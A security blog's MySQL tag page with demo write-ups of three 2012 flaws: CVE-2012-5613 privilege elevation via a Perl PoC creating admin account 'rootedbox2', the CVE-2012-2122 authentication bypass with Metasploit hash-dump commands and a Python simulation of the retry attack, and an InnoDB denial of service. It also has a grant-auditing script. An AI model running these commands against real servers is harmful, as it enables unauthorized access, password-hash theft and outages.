Tag Archives: MySQL

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

The following image links to an interactive visualization timeline of the main exploitable vulnerabilities of 2012.

The start date of a slide corresponds to one of:

  • the date the vulnerability was discovered,
  • the date it was reported to the vendor, or
  • the date it was publicly released.

The end date of a slide corresponds to one of:

  • the date of the vendor's security alert,
  • the date of Metasploit integration,
  • the date of the fix, or
  • the date of PoC disclosure.

CVE-2012-5613 MySQL Database Privilege Elevation 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01

PoC provided by :

kingcope

Reference(s) :

CVE-2012-5613
Full Disclosure Mailing-list
Red Hat Bugzilla

Affected version(s) :

MySQL 5.0
MySQL 5.1
Other ?

Tested on Centos 5.8 x86 with :

MySQL Server version 5.0.95 Source distribution

Description :

An attacker who can connect to a MySQL database as a user holding certain privileges (in the setup below, FILE on *.* together with ALL PRIVILEGES on one database) can use this vulnerability to create a MySQL administrator account. The account created by the PoC script is by default "rootedbox2" with the password "rootedbox2".

Commands :

On the target side :
CREATE DATABASE exampledb;
GRANT ALL PRIVILEGES ON exampledb.* TO user1@'192.168.178.26' IDENTIFIED BY 'test';
GRANT FILE ON *.* TO user1@'192.168.178.26' IDENTIFIED BY 'test'; 
FLUSH PRIVILEGES;

On the attacker side :
mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed
mysql -u rootedbox2 -h 192.168.178.34 -p -> denied
perl mysql_privilege_elevation.pl 
mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed
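As an added check (my own Python, not part of this write-up and not kingcope's PoC), the following parses SHOW GRANTS output and flags accounts holding the privilege combination the setup above gives user1: FILE on *.* plus ALL PRIVILEGES (or CREATE) on some database, or simply ALL PRIVILEGES on *.*. The grant lines are constructed to mirror that setup; the password hash is a placeholder and the accounts other than user1 are invented for contrast.

```python
import re

# Constructed sample of `SHOW GRANTS` output, mirroring the setup in the
# write-up (user1) plus invented accounts for contrast. Not captured from a
# real server; the password hash is a placeholder.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'user1'@'192.168.178.26' IDENTIFIED BY PASSWORD '*0000000000000000000000000000000000000000'",
    "GRANT FILE ON *.* TO 'user1'@'192.168.178.26'",
    "GRANT ALL PRIVILEGES ON `exampledb`.* TO 'user1'@'192.168.178.26'",
    "GRANT SELECT ON `exampledb`.* TO 'reporter'@'%'",
    "GRANT FILE ON *.* TO 'backup'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `app`.* TO 'app'@'10.0.0.%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>'[^']*'@'[^']*')",
    re.IGNORECASE,
)
ALL = {"ALL", "ALL PRIVILEGES"}


def parse_grant(line):
    """Split one SHOW GRANTS line into (account, scope, {privileges})."""
    m = GRANT_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a GRANT statement: {line!r}")
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    scope = m.group("scope").replace("`", "")
    return m.group("account"), scope, privs


def find_risky_accounts(grant_lines):
    """Return {account: [db, ...]} for accounts that hold FILE globally and
    also ALL PRIVILEGES or CREATE on at least one database ('*' stands for
    every database, i.e. ALL PRIVILEGES on *.*). This is the combination the
    PoC setup grants user1: FILE lets the account write files with
    SELECT ... INTO OUTFILE/DUMPFILE, and the database-level grant gives it
    a database of its own to work in."""
    file_global = set()
    writable = {}
    for line in grant_lines:
        account, scope, privs = parse_grant(line)
        if scope == "*.*":
            if "FILE" in privs or privs & ALL:
                file_global.add(account)
            if privs & ALL:
                writable.setdefault(account, []).append("*")
        elif privs & (ALL | {"CREATE"}):
            writable.setdefault(account, []).append(scope.split(".")[0])
    return {acct: dbs for acct, dbs in writable.items() if acct in file_global}


def report(grant_lines, secure_file_priv=""):
    """Human-readable summary. Pass the server's @@secure_file_priv: an
    empty value (the historical default) means INTO OUTFILE/DUMPFILE may
    write anywhere the mysqld process can, including the data directory."""
    risky = find_risky_accounts(grant_lines)
    lines = []
    for acct, dbs in sorted(risky.items()):
        lines.append(f"{acct}: FILE on *.* plus full access to {', '.join(dbs)}")
    if risky and secure_file_priv == "":
        lines.append("secure_file_priv is empty: file writes are unrestricted")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_GRANTS):
        print(line)
```

On a live server the input would be the output of SHOW GRANTS FOR each row of mysql.user; accounts flagged here should lose FILE unless they genuinely need it, and secure_file_priv should point at a directory outside the data directory.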

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to the vendor by Sergei Golubchik on 2012-04-06
Public release of the vulnerability on 2012-06-09
Metasploit PoC provided on 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL 5.1.x before 5.1.63 (on some platforms)
Oracle MySQL 5.5.x before 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted account must be allowed to connect remotely, for example:

grant all on *.* to root@'%' identified by 'password';

The flaw is in check_scramble() in sql/password.c: the int returned by memcmp() is passed back through a my_bool (a char), so only its low byte survives. On platforms whose memcmp() returns full byte or word differences rather than -1/0/1, a wrong password is therefore accepted whenever that low byte happens to be 0, roughly one attempt in 256, and repeating the login a few hundred times is enough. The Metasploit module exploits this password bypass to extract the usernames and password hashes from the MySQL server. These hashes are stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run
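As an added illustration (my own Python, not the Metasploit module and not MySQL's source), the following models the flaw end to end: the native authentication handshake, the server-side comparison whose memcmp() result is narrowed to a my_bool, and the attacker's loop that simply reconnects with the same wrong password until the narrowed value is 0. wide_memcmp is an assumed stand-in for an optimised memcmp that returns word differences rather than -1/0/1; the password "password", the salts and the seed are constructed.

```python
import hashlib
import random

SHA1_HASH_SIZE = 20


def wide_memcmp(a, b):
    """Stand-in (assumption, not libc code) for an optimised memcmp that
    returns the full difference of the first differing 32-bit words instead
    of -1/0/1. Implementations of this kind are why the bug was live on some
    platforms and not others."""
    for i in range(0, len(a), 4):
        wa = int.from_bytes(a[i:i + 4], "little")
        wb = int.from_bytes(b[i:i + 4], "little")
        if wa != wb:
            return wa - wb
    return 0


def narrow_memcmp(a, b):
    """A memcmp that only ever returns -1, 0 or 1: immune to the truncation."""
    return (a > b) - (a < b)


def to_my_bool(value):
    """What `return memcmp(...)` does when the function's return type is
    my_bool (a C char): keep the low 8 bits, sign-extended. 256, 512, ...
    all become 0, which the caller reads as 'passwords match'."""
    v = value & 0xFF
    return v - 256 if v > 127 else v


def stored_hash(password):
    """What mysql.user stores for a native-auth account: SHA1(SHA1(pw))."""
    return hashlib.sha1(hashlib.sha1(password).digest()).digest()


def scramble_response(password, salt):
    """Client side of the handshake: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    stage1 = hashlib.sha1(password).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mask = hashlib.sha1(salt + stage2).digest()
    return bytes(x ^ y for x, y in zip(stage1, mask))


def check_scramble(scramble, salt, stored_stage2, memcmp, vulnerable):
    """Server side, modelled on check_scramble() in sql/password.c: recover
    SHA1(pw) from the client's reply, hash it again and compare with the
    stored hash. Returns True when authentication succeeds."""
    mask = hashlib.sha1(salt + stored_stage2).digest()
    stage1 = bytes(x ^ y for x, y in zip(scramble, mask))
    reassured = hashlib.sha1(stage1).digest()
    diff = memcmp(stored_stage2, reassured)
    if vulnerable:
        # pre-fix: the int from memcmp is narrowed to my_bool on return
        return to_my_bool(diff) == 0
    # post-fix: the result is normalised to 0/1 before it is returned
    return diff == 0


def try_login(seed, password, stored_stage2, memcmp, vulnerable, max_attempts=5000):
    """Reconnect with the same (wrong) password until the server lets us in.
    Each connection gets a fresh random 20-byte salt, as mysqld would send,
    so on a vulnerable build each attempt is an independent ~1/256 chance.
    Returns the attempt number that succeeded, or None."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        salt = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        if check_scramble(scramble_response(password, salt), salt,
                          stored_stage2, memcmp, vulnerable):
            return attempt
    return None


if __name__ == "__main__":
    stored = stored_hash(b"password")
    print("vulnerable, wide memcmp  :", try_login(1, b"wrong", stored, wide_memcmp, True))
    print("vulnerable, narrow memcmp:", try_login(1, b"wrong", stored, narrow_memcmp, True))
    print("fixed, wide memcmp       :", try_login(1, b"wrong", stored, wide_memcmp, False))
```

The three runs show why the advisory says "on some platforms": the same buggy return statement is harmless when memcmp() only returns -1/0/1, and the fixed comparison never lets the wrong password through regardless of the memcmp() in use.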

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities on 2012-03-21
Details of the vulnerability published by Oracle on 2012-04-10
PoC provided by Oracle on 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

On 21 March 2012 Oracle released two new versions of MySQL, 5.5.22 and 5.1.62. These versions fix two bugs, #13510739 and #63775, which are treated as security fixes, but no details of their impact are provided and the bug reports are closed.
Unfortunately for Oracle, the two new versions shipped with a development script, "mysql-test/suite/innodb/t/innodb_bug13510739.test", written to test the fix, which amounts to a PoC provided by Oracle itself. The bugs cause a denial of service of MySQL "ON HANDLER READ NEXT AFTER DELETE RECORD". All the details are available in the script or at the Pastebin link above.

Commands :

mysql -u root -p database < innodb_bug13510739.test